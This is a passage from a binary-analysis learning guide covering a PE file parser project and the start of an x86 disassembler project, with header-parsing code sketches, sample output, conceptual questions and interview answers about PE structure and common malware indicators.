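# Synthetic header: two program headers right after the ELF header, no section table.
ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)
header = ELF64_EHDR.pack(ident, 2, 0x3E, 1, 0x401000, 64, 0, 0, 64, 56, 2, 64, 0, 0)
info = summarize_elf64_header(header)
print(info)
```

The synthetic header describes a file the loader could still map (it has program headers) even though `has_section_headers` is false.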


Project 2: PE File Parser

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python, Rust
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Binary Formats / Windows Executables
  • Software or Tool: PE files, Windows or Wine
  • Main Book: “Practical Malware Analysis” by Sikorski & Honig

What you’ll build: A PE file parser that extracts headers, sections, imports, exports, and resources from Windows executables.

Why it teaches binary analysis: Windows malware analysis requires understanding PE format. Most real-world targets are Windows binaries.

Core challenges you’ll face:

  • DOS header and stub → maps to legacy compatibility
  • COFF and Optional headers → maps to PE32 vs PE32+
  • Import Address Table (IAT) → maps to dynamic linking, API calls
  • Export directory → maps to DLL functions

Resources for key challenges:

Key Concepts:

  • PE Structure: “Practical Malware Analysis” Ch. 1
  • Import Table: PE Format specification
  • Resources: CFF Explorer documentation

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Project 1 (ELF Parser), understanding of Windows APIs

Real world outcome:

$ ./pe_parser suspicious.exe
DOS Header:
  Magic: MZ (0x5a4d)
  PE Offset: 0x100

PE Header:
  Signature: PE (0x4550)
  Machine: x64 (0x8664)
  Sections: 5
  Timestamp: 2024-01-15 14:32:01

Optional Header:
  Magic: PE32+ (0x20b)
  Entry Point: 0x1400012a0
  Image Base: 0x140000000

Sections:
  Name     VirtAddr   VirtSize   RawSize    Flags
  .text    0x1000     0x5a00     0x5c00     CODE,EXECUTE,READ
  .rdata   0x7000     0x1e00     0x2000     READ
  .data    0x9000     0x400      0x200      READ,WRITE

Imports:
  KERNEL32.dll:
    - CreateFileA
    - ReadFile
    - WriteFile
    - VirtualAlloc    ← Suspicious!
  WS2_32.dll:
    - socket          ← Network activity!
    - connect
    - send
    - recv

Implementation Hints:

The PE format has a layered structure. Parse it step by step:

  1. Read DOS header at offset 0
  2. Follow e_lfanew to find PE signature
  3. Parse COFF header immediately after signature
  4. Parse Optional Header (size varies by PE32 vs PE32+)
  5. Parse section headers after Optional Header
  6. Use Data Directories to find imports, exports, resources
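
The first five steps can be sketched with nothing but `struct`. This is an illustrative walk over a synthetic buffer, not a complete parser: the function name `parse_pe_headers` and the demo values (e_lfanew of 0x100, five sections, an Optional Header size of 0xF0) are assumptions chosen to resemble the sample output above.

```python
import struct

def parse_pe_headers(data: bytes) -> dict:
    # Step 1: the DOS header at offset 0 starts with "MZ".
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    # Step 2: e_lfanew (4 bytes at 0x3C) is the file offset of the PE signature.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # Step 3: the 20-byte COFF header follows the signature.
    coff_off = e_lfanew + 4
    machine, num_sections, _time, _symtab, _nsyms, opt_size, _chars = \
        struct.unpack_from("<HHIIIHH", data, coff_off)
    # Step 4: the Optional Header starts with a magic that selects PE32 or PE32+.
    opt_off = coff_off + 20
    (magic,) = struct.unpack_from("<H", data, opt_off)
    # Step 5: the section table begins right after the Optional Header.
    return {
        "machine": machine,
        "num_sections": num_sections,
        "magic": magic,
        "section_table_offset": opt_off + opt_size,
    }

# Synthetic demo buffer (only the fields read above are filled in).
demo = bytearray(0x200)
demo[0:2] = b"MZ"
struct.pack_into("<I", demo, 0x3C, 0x100)
demo[0x100:0x104] = b"PE\0\0"
struct.pack_into("<HHIIIHH", demo, 0x104, 0x8664, 5, 0, 0, 0, 0xF0, 0x22)
struct.pack_into("<H", demo, 0x118, 0x20B)
info = parse_pe_headers(bytes(demo))
print({k: hex(v) for k, v in info.items()})
```

Note that the section table offset is computed from SizeOfOptionalHeader rather than from a fixed structure size, which is what lets the same code handle both PE32 and PE32+.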

Key questions:

  • What does IMAGE_DIRECTORY_ENTRY_IMPORT point to?
  • How are imported function names resolved (hint: thunks)?
  • What’s the difference between an RVA and a file offset?

Learning milestones:

  1. Parse headers correctly → Understand PE structure
  2. Extract imports → See what APIs the program uses
  3. Extract exports → Understand DLLs
  4. Handle both PE32 and PE32+ → Support all Windows binaries

The Core Question You’re Answering

How does Windows organize executable code, manage dynamic linking differently from Unix, and why has this format become the primary target for malware authors worldwide?

The PE format reveals Windows’ architectural philosophy: backward compatibility at all costs, rich metadata for tools, and a structure that has evolved from MS-DOS through to modern 64-bit Windows. Understanding PE is understanding the Windows ecosystem.

Concepts You Must Understand First

1. The DOS Legacy and Stub Programs

Every PE file begins with an MS-DOS executable. This seems bizarre until you understand Windows’ commitment to backward compatibility.

Guiding questions:

  • Why does a Windows 11 executable start with “MZ” from 1981?
  • What happens if you run a PE file in pure DOS?
  • How does the Windows loader get past the DOS stub to the real PE headers? (Hint: e_lfanew)

Key reading: “Practical Malware Analysis” Ch. 1.2 (Portable Executable File Format), “Practical Binary Analysis” Ch. 2.4 (The PE Format)

2. Relative Virtual Addresses (RVAs) vs. File Offsets

Unlike ELF, which records both file offsets and virtual addresses, PE relies heavily on RVAs. Almost every pointer in a PE file is an RVA, not a raw file offset.

Guiding questions:

  • What is an RVA relative to? (Hint: ImageBase)
  • How do you convert an RVA to a file offset?
  • Why does malware often modify ImageBase?

Key reading: “Practical Malware Analysis” Ch. 1.2 (The PE File Structure), Microsoft PE/COFF Specification Section 3 (COFF File Header)
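
A sketch of the RVA-to-file-offset conversion, assuming the section headers have already been parsed into a list. The `Section` tuple and `rva_to_offset` helper are hypothetical names; the virtual addresses and sizes mirror the sample output above, while the PointerToRawData values (0x400, 0x6000, 0x8000) are invented for the demo because the sample does not print them.

```python
from typing import NamedTuple, Optional, Sequence

class Section(NamedTuple):
    name: str
    virtual_address: int      # RVA where the section is mapped
    virtual_size: int         # size in memory
    pointer_to_raw_data: int  # file offset of the section's bytes
    size_of_raw_data: int     # size on disk

def rva_to_offset(rva: int, sections: Sequence[Section]) -> Optional[int]:
    """FileOffset = RVA - VirtualAddress + PointerToRawData, or None if unmapped."""
    for s in sections:
        span = max(s.virtual_size, s.size_of_raw_data)
        if s.virtual_address <= rva < s.virtual_address + span:
            delta = rva - s.virtual_address
            if delta >= s.size_of_raw_data:
                return None  # exists only in memory (zero-filled tail), no file bytes
            return s.pointer_to_raw_data + delta
    return None  # not inside any section (this sketch ignores the header region)

sections = [
    Section(".text", 0x1000, 0x5A00, 0x400, 0x5C00),
    Section(".rdata", 0x7000, 0x1E00, 0x6000, 0x2000),
    Section(".data", 0x9000, 0x400, 0x8000, 0x200),
]
print(hex(rva_to_offset(0x12A0, sections)))  # entry point RVA from the sample
```

Returning `None` for the memory-only tail of `.data` is a design choice: it forces callers to notice RVAs that have no backing bytes in the file, which matters when parsing deliberately malformed samples.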

3. Import Address Table (IAT) and Dynamic Linking

Windows programs discover API functions differently than Unix. The IAT is the gateway to understanding what a program can do.

Guiding questions:

  • What’s the difference between the Import Name Table and the Import Address Table?
  • How does the Windows loader populate the IAT at load time?
  • Why do malware analysts always check the IAT first?

Key reading: “Practical Malware Analysis” Ch. 1.2.5 (The .idata Section), “Practical Binary Analysis” Ch. 2.4.5 (Import Directory)
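
Each entry in the Import Name Table is a thunk: either an ordinal or the RVA of a hint/name record. The sketch below decodes one thunk value under the layout given in the PE/COFF specification (top bit is the ordinal flag, low 16 bits the ordinal, low 31 bits the name RVA). The function name `decode_thunk` and the sample values are illustrative only.

```python
IMAGE_ORDINAL_FLAG32 = 0x80000000
IMAGE_ORDINAL_FLAG64 = 0x8000000000000000

def decode_thunk(value: int, pe32_plus: bool):
    """Classify one Import Name Table entry (4 bytes in PE32, 8 in PE32+)."""
    if value == 0:
        return ("end", None)                    # a zero thunk terminates the table
    flag = IMAGE_ORDINAL_FLAG64 if pe32_plus else IMAGE_ORDINAL_FLAG32
    if value & flag:
        return ("ordinal", value & 0xFFFF)      # import by number
    return ("name_rva", value & 0x7FFFFFFF)     # RVA of the hint/name record

print(decode_thunk(0x8000000000000010, pe32_plus=True))
print(decode_thunk(0x2A40, pe32_plus=False))
```

Before loading, the Import Address Table normally holds the same thunk values; the loader later overwrites those slots with resolved function addresses.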

4. Sections vs. Segments (Windows Style)

Windows doesn’t call them segments; everything is a section. But sections have two alignments: one on disk and one in memory.

Guiding questions:

  • What is SectionAlignment vs FileAlignment?
  • Why is the .text section often larger in memory than on disk?
  • How does section padding affect packing detection?

Key reading: Microsoft PE/COFF Specification Section 4 (Section Table), “Practical Malware Analysis” Ch. 18.1 (Packers and Unpacking)
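
A small sketch of how alignment shapes the in-memory layout. It assumes a SectionAlignment of 0x1000 (the sample output above does not print it) and reuses the sample's VirtAddr and VirtSize values; `align_up` is a hypothetical helper name.

```python
def align_up(value: int, alignment: int) -> int:
    """Round value up to the next multiple of alignment."""
    return -(-value // alignment) * alignment

SECTION_ALIGNMENT = 0x1000  # assumed; typical for x86/x64 images

# (name, VirtualAddress, VirtualSize) taken from the sample parser output
sections = [(".text", 0x1000, 0x5A00), (".rdata", 0x7000, 0x1E00), (".data", 0x9000, 0x400)]
for name, virtual_address, virtual_size in sections:
    end = virtual_address + align_up(virtual_size, SECTION_ALIGNMENT)
    print(f"{name:7} occupies 0x{virtual_address:x}-0x{end:x} in memory")
```

With this assumption each section's aligned end equals the next section's VirtualAddress (0x7000, then 0x9000), which is the contiguity a validator can check for in a well-formed image.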

5. PE32 vs. PE32+ (32-bit vs. 64-bit)

Unlike ELF, which defines parallel Elf32 and Elf64 structures throughout, PE keeps most structures identical and mainly widens a few Optional Header fields (such as ImageBase) to 64 bits.

Guiding questions:

  • How do you detect PE32 vs. PE32+? (Hint: Magic field)
  • What fields change between PE32 and PE32+?
  • Can a 64-bit Windows process load 32-bit DLLs?

Key reading: Microsoft PE/COFF Specification Section 3.4 (Optional Header), “Practical Binary Analysis” Ch. 2.4.3 (PE Optional Header)
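
One concrete difference is ImageBase: in PE32 it is a 4-byte field at offset 28 of the Optional Header (after BaseOfData), while PE32+ drops BaseOfData and stores an 8-byte ImageBase at offset 24. The sketch below reads it from the start of an Optional Header; `read_image_base` and the two synthetic buffers are illustrative.

```python
import struct

def read_image_base(optional_header: bytes):
    """Return (format name, ImageBase) from the start of an Optional Header."""
    (magic,) = struct.unpack_from("<H", optional_header, 0)
    if magic == 0x10B:    # PE32: 4-byte ImageBase at offset 28
        (image_base,) = struct.unpack_from("<I", optional_header, 28)
        return "PE32", image_base
    if magic == 0x20B:    # PE32+: 8-byte ImageBase at offset 24
        (image_base,) = struct.unpack_from("<Q", optional_header, 24)
        return "PE32+", image_base
    raise ValueError(f"unexpected Optional Header magic 0x{magic:x}")

# Synthetic headers with only Magic and ImageBase filled in.
pe32 = bytearray(32)
struct.pack_into("<H", pe32, 0, 0x10B)
struct.pack_into("<I", pe32, 28, 0x400000)

pe32_plus = bytearray(32)
struct.pack_into("<H", pe32_plus, 0, 0x20B)
struct.pack_into("<Q", pe32_plus, 24, 0x140000000)

print(read_image_base(bytes(pe32)), read_image_base(bytes(pe32_plus)))
```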

6. Export Directory and DLL Internals

DLLs are PE files that export functions. Understanding exports is key to understanding how Windows APIs work.

Guiding questions:

  • How are exported functions named vs. numbered (ordinals)?
  • What’s the export forwarding chain?
  • Why do some DLLs export thousands of functions?

Key reading: “Practical Malware Analysis” Ch. 1.2.6 (The .edata Section), Microsoft PE/COFF Specification Section 6.3 (Export Directory Table)

7. PE Resources and the .rsrc Section

Unlike ELF, PE files contain a rich resource tree: icons, dialogs, version info, and sometimes malware payloads.

Guiding questions:

  • How is the resource tree structured?
  • What is a resource ID vs. a resource name?
  • Why do analysts check .rsrc for embedded executables?

Key reading: “Practical Malware Analysis” Ch. 1.2.7 (PE File Headers and Sections), Microsoft PE/COFF Specification Section 6.9 (Resource Format)

8. Data Directories and the Optional Header

The PE Optional Header contains 16 data directory entries pointing to critical structures.

Guiding questions:

  • What are the most important data directories for malware analysis?
  • How does IMAGE_DIRECTORY_ENTRY_IMPORT relate to the IAT?
  • What does IMAGE_DIRECTORY_ENTRY_SECURITY contain?

Key reading: “Practical Binary Analysis” Ch. 2.4.4 (Data Directories), Microsoft PE/COFF Specification Section 3.4.4 (Optional Header Data Directories)
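
A sketch of enumerating the data directories, assuming the Optional Header bytes are already in hand. NumberOfRvaAndSizes sits at offset 92 (PE32) or 108 (PE32+) and the array of (RVA, Size) pairs follows it. The short directory names and the demo values are made up for illustration.

```python
import struct

DIRECTORY_NAMES = [
    "Export", "Import", "Resource", "Exception", "Security", "BaseReloc",
    "Debug", "Architecture", "GlobalPtr", "TLS", "LoadConfig", "BoundImport",
    "IAT", "DelayImport", "CLR", "Reserved",
]

def read_data_directories(optional_header: bytes) -> dict:
    """Return {name: (rva, size)} for every non-empty data directory."""
    (magic,) = struct.unpack_from("<H", optional_header, 0)
    count_offset = {0x10B: 92, 0x20B: 108}[magic]
    (count,) = struct.unpack_from("<I", optional_header, count_offset)
    directories = {}
    # Never trust the count beyond the 16 known slots; malformed files lie here.
    for i in range(min(count, len(DIRECTORY_NAMES))):
        rva, size = struct.unpack_from("<II", optional_header, count_offset + 4 + 8 * i)
        if rva or size:
            # Note: for "Security" the first field is a file offset, not an RVA.
            directories[DIRECTORY_NAMES[i]] = (rva, size)
    return directories

# Synthetic 240-byte PE32+ Optional Header with two directories filled in.
demo = bytearray(240)
struct.pack_into("<H", demo, 0, 0x20B)
struct.pack_into("<I", demo, 108, 16)
struct.pack_into("<II", demo, 112 + 8 * 1, 0x7A00, 0x50)    # Import
struct.pack_into("<II", demo, 112 + 8 * 12, 0x7000, 0x120)  # IAT
dirs = read_data_directories(bytes(demo))
print({name: (hex(rva), hex(size)) for name, (rva, size) in dirs.items()})
```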

Questions to Guide Your Design

  1. How will you handle RVA-to-file-offset conversion? You’ll need this constantly. Should you pre-build a lookup table from section headers?

  2. Will you parse imports by name or by ordinal? Some DLLs export by ordinal only. Your parser needs to handle both.

  3. How deeply will you parse the resource tree? Resources can be nested multiple levels. Will you recurse fully or just show top-level?

  4. What validation will you perform? PE files from malware are often malformed intentionally to break tools.

  5. How will you display suspicious indicators? Highlight imports like VirtualAlloc, WriteProcessMemory, or unusual section names?

  6. Will you support bound imports? Bound imports pre-cache IAT addresses for performance. Modern Windows versions largely ignore them, since ASLR usually invalidates the cached addresses.

  7. How will you handle exports in executables? EXEs can export functions (rare but legal). Will you check for this?

  8. Should you calculate entropy per section? High entropy suggests packing or encryption, a key malware indicator.
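
For the entropy question, a minimal sketch of Shannon entropy over a section's raw bytes, measured in bits per byte (0.0 for constant data, 8.0 for a uniform byte distribution). The function name is illustrative, and any threshold you pick for "suspicious" is a heuristic rather than a rule.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

zero_padding = bytes(1024)            # e.g. an empty, zero-filled section
uniform = bytes(range(256)) * 4       # every byte value equally likely
print(shannon_entropy(zero_padding), shannon_entropy(uniform))
```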

Thinking Exercise

Before writing code, perform these manual exercises:

Exercise 1: Manual PE Parsing

xxd -l 512 /path/to/some.exe  # or use a Windows PE file

Using a hex editor and the PE specification:

  1. Find the “MZ” signature at offset 0
  2. Navigate to offset 0x3C and read the 4-byte value (e_lfanew)
  3. Jump to that offset and verify “PE\0\0” signature
  4. Parse the COFF header: Machine type, Number of sections, Timestamp
  5. Calculate where the Section Table begins

Write down each calculation. This cements the layered structure.

Exercise 2: Trace an Import

Using a tool like CFF Explorer or pefile (Python):

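import pefile

pe = pefile.PE('suspicious.exe')
# pefile only sets DIRECTORY_ENTRY_IMPORT when the file has an import directory
for entry in getattr(pe, 'DIRECTORY_ENTRY_IMPORT', []):
    print(entry.dll.decode())
    for imp in entry.imports:
        # imp.name is None when the function is imported by ordinal
        name = imp.name.decode() if imp.name else f'Ordinal {imp.ordinal}'
        print(f'  {name}')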

Pick one import (e.g., CreateFileA from KERNEL32.dll):

  1. Find its entry in the Import Directory
  2. Locate the Import Name Table entry
  3. Find the corresponding Import Address Table entry
  4. Understand how the loader will patch this at runtime

Exercise 3: Section Alignment Analysis

For a sample PE file:

  1. Note FileAlignment and SectionAlignment from Optional Header
  2. For each section, calculate:
    • VirtualAddress (where it loads in memory)
    • VirtualSize (size in memory)
    • PointerToRawData (offset in file)
    • SizeOfRawData (size in file)
  3. Identify any discrepancies, which are common in packed malware

Exercise 4: Resource Tree Exploration

# On Linux, use wrestool from icoutils
wrestool -x --output=. sample.exe
# Extracts all resources into the current directory (use -l to list them instead)

Explore the .rsrc section:

  1. How many resource types exist? (RT_ICON, RT_DIALOG, etc.)
  2. Are there any unusual resource names?
  3. Check for embedded PEs or suspicious binary blobs

Draw the resource tree structure manually.

The Interview Questions They’ll Ask

  1. “What’s the difference between the DOS header and the PE header?”
    • The DOS header (MZ header) is at offset 0 for DOS compatibility. Its e_lfanew field points to the real PE header (PE\0\0 signature). The PE header contains the COFF header and Optional Header.
  2. “How do you convert an RVA to a file offset?”
    • Find which section contains the RVA by checking section VirtualAddress ranges. Then: FileOffset = RVA - SectionVirtualAddress + SectionPointerToRawData.
  3. “Explain how the Windows loader populates the IAT.”
    • The loader walks the Import Directory, maps each listed DLL (the equivalent of LoadLibrary), resolves each imported function by name or ordinal (the equivalent of GetProcAddress), and writes the resolved addresses into the Import Address Table.
  4. “What are some red flags in a PE file that suggest malware?”
    • Unusual section names (.aspack, UPX0/UPX1), high entropy sections, implausible timestamps, imports of process injection APIs (CreateRemoteThread, VirtualAllocEx), tiny .text section with huge .data, resources larger than code sections.
  5. “What’s the difference between IMAGE_FILE_EXECUTABLE_IMAGE and IMAGE_FILE_DLL?”
    • Both are flags in the COFF Characteristics field. IMAGE_FILE_EXECUTABLE_IMAGE means it’s a valid executable image. IMAGE_FILE_DLL means it’s a DLL (cannot be run directly, must be loaded into a process).
  6. “How does ASLR work in Windows PE files?”
    • If DllCharacteristics includes IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, the OS can relocate the image to a random base address. The .reloc section contains fixup information for this.
  7. “What is ordinal importing and why is it used?”
    • Instead of importing by name (“CreateFileA”), you import by number (ordinal 1234). It’s smaller and slightly faster but breaks if DLL versions change. Often used in system DLLs.
  8. “What’s in the .reloc section?”
    • Base relocation entries. If the PE can’t load at its preferred ImageBase, the loader uses these entries to fix up all absolute addresses. Required for DLLs and ASLR-enabled EXEs.
  9. “How can you tell if a PE is packed?”
    • Check section names (UPX, ASPack, etc.), compare SizeOfImage to raw file size, calculate entropy (packed sections have high entropy, roughly 7.5-8.0 bits per byte), look for an abnormal entry point (EP in the last section or in a writable section).
  10. “What’s the significance of the TLS (Thread Local Storage) directory?”
    • TLS callbacks execute before the code at AddressOfEntryPoint. Malware uses TLS callbacks for anti-debugging and to run code before analysts expect.

Books That Will Help

Topic | Book | Chapter/Section
PE Format Overview | “Practical Malware Analysis” by Sikorski & Honig | Ch. 1: Basic Static Techniques (PE File Format)
PE File Structure | “Practical Binary Analysis” by Dennis Andriesse | Ch. 2.4: The PE Format - A Comparison with ELF
Import/Export Tables | “Practical Malware Analysis” | Ch. 1.2.5-1.2.6: Imports and Exports
PE Headers Deep Dive | “Practical Binary Analysis” | Ch. 2.4.3-2.4.5: PE Headers and Data Directories
Dynamic Linking on Windows | “Practical Malware Analysis” | Ch. 7: Analyzing Malicious Windows Programs
Resource Sections | “Practical Malware Analysis” | Ch. 1.2.7: PE Sections (Resources)
Packers and Obfuscation | “Practical Malware Analysis” | Ch. 18: Packers and Unpacking
RVA and Address Calculations | Microsoft PE/COFF Specification | Section 4: Section Table (online)
Windows Internals (Loading) | “Windows Internals” by Russinovich et al. | Part 1, Ch. 3: System Mechanisms (Image Loader)
Malware Analysis Techniques | “Practical Malware Analysis” | Ch. 3: Basic Dynamic Analysis
File Format Reversing | “Hacking: The Art of Exploitation” by Erickson | Ch. 4: Exploitation (Binary Formats section)
Section Characteristics | Microsoft PE/COFF Specification | Section 4.1: Section Flags (online)
TLS Callbacks | “Practical Malware Analysis” | Ch. 16: Anti-Debugging (TLS Callbacks section)
Reference: PE/COFF Spec | Microsoft PE/COFF Specification | All sections (online documentation)

ASCII Diagram: PE File Structure

+--------------------------------+
|        DOS Header (MZ)         |  <-- Offset 0x00
|  e_magic = "MZ" (0x5A4D)       |      DOS compatibility stub
|  ...                           |
|  e_lfanew = 0x000000E0         |  --> Points to PE Header
+--------------------------------+
|                                |
|        DOS Stub Program        |      "This program cannot be run in DOS mode"
|  (can be modified/enlarged)    |
+--------------------------------+
|                                |
|   PE Signature (PE\0\0)        |  <-- Offset e_lfanew (e.g., 0xE0)
|   0x00004550                   |
+--------------------------------+
|        COFF Header             |
|  Machine (0x8664 = x64)        |
|  NumberOfSections              |
|  TimeDateStamp                 |
|  SizeOfOptionalHeader          |
|  Characteristics               |
+--------------------------------+
|      Optional Header           |
|  Magic (0x10B=PE32/0x20B=PE32+)|
|  AddressOfEntryPoint           |  --> Where execution begins (RVA)
|  ImageBase                     |      Preferred load address
|  SectionAlignment              |      Alignment in memory (usually 0x1000)
|  FileAlignment                 |      Alignment on disk (usually 0x200)
|  SizeOfImage                   |      Total size when loaded
|  SizeOfHeaders                 |
|  Subsystem (GUI/Console)       |
|  DllCharacteristics            |      ASLR, DEP flags, etc.
|  NumberOfRvaAndSizes           |      Usually 16
|                                |
|    Data Directories [16]       |
|    [0] Export Table            |
|    [1] Import Table            |  --> Critical for analysis
|    [2] Resource Table          |
|    [3] Exception Table         |
|    [5] Base Relocation         |
|    [9] TLS Table               |      TLS callbacks
|    [12] IAT                    |      Import Address Table
|    [14] COM Descriptor         |      .NET assemblies
+--------------------------------+
|                                |
|      Section Table             |      NumberOfSections entries
|   [Section Header for .text]   |
|     Name = ".text"             |
|     VirtualSize                |
|     VirtualAddress (RVA)       |      Where it loads in memory
|     SizeOfRawData              |
|     PointerToRawData           |      Offset in file
|     Characteristics (RX)       |      Readable + Executable
|                                |
|   [Section Header for .rdata]  |
|   [Section Header for .data]   |
|   [Section Header for .rsrc]   |
|   [Section Header for .reloc]  |
+--------------------------------+
|                                |
|     .text Section              |  <-- Executable code
|   (machine code bytes)         |
|                                |
+--------------------------------+
|     .rdata Section             |  <-- Read-only data
|   Import Directory             |      Import Name Table (INT)
|   Import Address Table (IAT)   |      Function pointers (patched by loader)
|   String literals              |
+--------------------------------+
|     .data Section              |  <-- Initialized writable data
|   Global variables             |
+--------------------------------+
|     .rsrc Section              |  <-- Resources (icons, strings, dialogs)
|   Resource Directory Tree      |
|   Icons, Version Info          |
+--------------------------------+
|     .reloc Section             |  <-- Base relocations for ASLR
|   Relocation blocks            |
+--------------------------------+

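Key Insight: The Import Address Table (IAT) is one of the first things to analyze. It lists the API functions the program imports at load time, which gives a behavioral fingerprint. In malware, suspicious imports like VirtualAlloc + WriteProcessMemory + CreateRemoteThread suggest process injection. The fingerprint is not complete, though: packed or evasive samples often resolve additional APIs at runtime through LoadLibrary and GetProcAddress.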

Project 3: Build a Simple Disassembler

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python (with Capstone), Rust
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Disassembly / x86 Instruction Encoding
  • Software or Tool: Intel manuals, Capstone engine
  • Main Book: “Intel 64 and IA-32 Architectures Software Developer’s Manual”

What you’ll build: A disassembler that converts x86/x64 machine code into human-readable assembly instructions.

Why it teaches binary analysis: Understanding how machine code maps to assembly is fundamental. Building a disassembler forces you to understand instruction encoding.

Core challenges you’ll face:

  • Variable-length instructions → maps to x86 has 1-15 byte instructions
  • Prefixes and REX bytes → maps to operand size, 64-bit registers
  • ModR/M and SIB bytes → maps to addressing modes
  • Immediate and displacement → maps to constants and offsets

Resources for key challenges:

Key Concepts:

  • x86 Instruction Format: Intel SDM Volume 2, Chapter 2
  • ModR/M Encoding: X86 Opcode Reference
  • Linear vs Recursive Descent: “Practical Binary Analysis” Ch. 6

Difficulty: Advanced Time estimate: 2-4 weeks Prerequisites: Projects 1-2, solid x86 assembly knowledge

Real world outcome:

$ ./disasm program.bin
00000000: 55                    push rbp
00000001: 48 89 e5              mov rbp, rsp
00000004: 48 83 ec 40           sub rsp, 0x40
00000008: 48 8d 45 c0           lea rax, [rbp-0x40]
0000000c: 48 89 c7              mov rdi, rax
0000000f: e8 xx xx xx xx        call 0x????????
00000014: 31 c0                 xor eax, eax
00000016: c9                    leave
00000017: c3                    ret

Implementation Hints:

x86 instruction format:

[Prefixes] [REX] [Opcode] [ModR/M] [SIB] [Displacement] [Immediate]
   0-4       0-1    1-3      0-1     0-1      0-4           0-8

Start simple:

  1. Handle single-byte opcodes first (push, pop, ret, nop)
  2. Add instructions with ModR/M byte (mov, add, sub)
  3. Add REX prefix support for 64-bit
  4. Add SIB byte for complex addressing
  5. Handle prefixes (operand size, segment override)
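
Step 1 can be as small as the sketch below, which assumes 64-bit mode and no prefix bytes. It covers only the opcodes where the whole instruction is one byte: `push`/`pop` encode the register in the low three bits of the opcode (0x50+r and 0x58+r), and `nop`, `ret`, and `leave` have fixed values. The function name is illustrative.

```python
REGS64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
FIXED = {0x90: "nop", 0xC3: "ret", 0xC9: "leave"}

def decode_one_byte(opcode: int):
    """Return the mnemonic for a supported one-byte instruction, else None."""
    if 0x50 <= opcode <= 0x57:
        return f"push {REGS64[opcode - 0x50]}"   # register number is opcode & 7
    if 0x58 <= opcode <= 0x5F:
        return f"pop {REGS64[opcode - 0x58]}"
    return FIXED.get(opcode)

for byte in (0x55, 0x5D, 0xC9, 0xC3, 0x48):
    print(f"{byte:02x}: {decode_one_byte(byte) or '(needs more decoding)'}")
```

Returning `None` for anything else (such as the REX prefix 0x48) gives later steps a clear hook: the caller falls through to the ModR/M and prefix handling added in steps 2 to 5.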

Questions to consider:

  • How do you distinguish mov eax, ebx from mov eax, [ebx]?
  • What does the REX.W prefix do?
  • How do you handle instructions with the same opcode but different meanings?

Learning milestones:

  1. Disassemble basic instructions → Single-byte opcodes work
  2. Handle ModR/M byte → Register and memory operands
  3. Support 64-bit mode → REX prefix parsing
  4. Handle all addressing modes → SIB byte, displacements

The Core Question You’re Answering

How does a CPU decode variable-length instruction streams into executable operations, and why is x86 considered one of the most complex instruction sets to disassemble?

Disassembly is reverse compilation at the lowest level. You’re recreating human-readable assembly from the raw bytes the CPU executes. Unlike fixed-width RISC architectures, x86/x64 instructions range from 1 to 15 bytes, making this problem fundamentally about pattern recognition and context.

Concepts You Must Understand First

1. Instruction Encoding and Variable-Length Instructions

x86 is a CISC (Complex Instruction Set Computer) architecture. One instruction might be 1 byte (ret), while another reaches the 15-byte limit (for example, several prefixes plus ModR/M, SIB, a 32-bit displacement, and a 32-bit immediate).

Guiding questions:

  • Why doesn’t x86 use fixed-width instructions like ARM or MIPS?
  • How does the CPU know where one instruction ends and the next begins?
  • What happens if you try to disassemble from the wrong offset (misaligned)?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 3.5 (Instruction Encoding), Intel SDM Volume 2A Ch. 2 (Instruction Format)

2. Opcode Tables and Instruction Prefixes

The first byte (or bytes) of an instruction determine what it does. But prefixes can modify almost everything.

Guiding questions:

  • What’s the difference between a one-byte opcode and a two-byte opcode (0x0F escape)?
  • How many prefix bytes can one instruction have?
  • What does the LOCK prefix do?

Key reading: Intel 64 and IA-32 Architectures Software Developer’s Manual Volume 2, “Low-Level Programming” Ch. 3.5 (x86-64 Assembly Language)

3. ModR/M and SIB Bytes: Operand Encoding

After the opcode comes ModR/M (Mod-Reg-R/M), which encodes register and memory operands. Sometimes a SIB (Scale-Index-Base) byte follows.

Guiding questions:

  • How does ModR/M encode mov eax, ebx vs mov eax, [ebx]?
  • When do you need a SIB byte?
  • What do the Mod field values (00, 01, 10, 11) mean?

Key reading: Intel SDM Volume 2A Sections 2.1.3 and 2.1.5 (ModR/M and SIB Bytes and their addressing-mode encoding), “Practical Binary Analysis” Ch. 6.2.2 (Linear Disassembly)
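
A sketch of the ModR/M split, plus a deliberately tiny decoder for two MOV opcodes in 32-bit operand size. It handles only the register-direct form (Mod=11) and the plain `[reg]` form (Mod=00 without SIB or disp32); the function names are illustrative and everything else raises `NotImplementedError`.

```python
REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def split_modrm(byte: int):
    """Return (mod, reg, rm): 2 bits, 3 bits, 3 bits."""
    return (byte >> 6) & 0b11, (byte >> 3) & 0b111, byte & 0b111

def decode_mov(opcode: int, modrm: int) -> str:
    mod, reg, rm = split_modrm(modrm)
    if mod == 0b11:
        rm_text = REGS32[rm]                    # register direct
    elif mod == 0b00 and rm not in (0b100, 0b101):
        rm_text = f"[{REGS32[rm]}]"             # memory, no displacement
    else:
        raise NotImplementedError("SIB and displacement forms are out of scope")
    if opcode == 0x89:                          # MOV r/m32, r32
        return f"mov {rm_text}, {REGS32[reg]}"
    if opcode == 0x8B:                          # MOV r32, r/m32
        return f"mov {REGS32[reg]}, {rm_text}"
    raise NotImplementedError(f"opcode 0x{opcode:02x}")

print(decode_mov(0x89, 0xD8))   # register form
print(decode_mov(0x8B, 0x03))   # memory form
```

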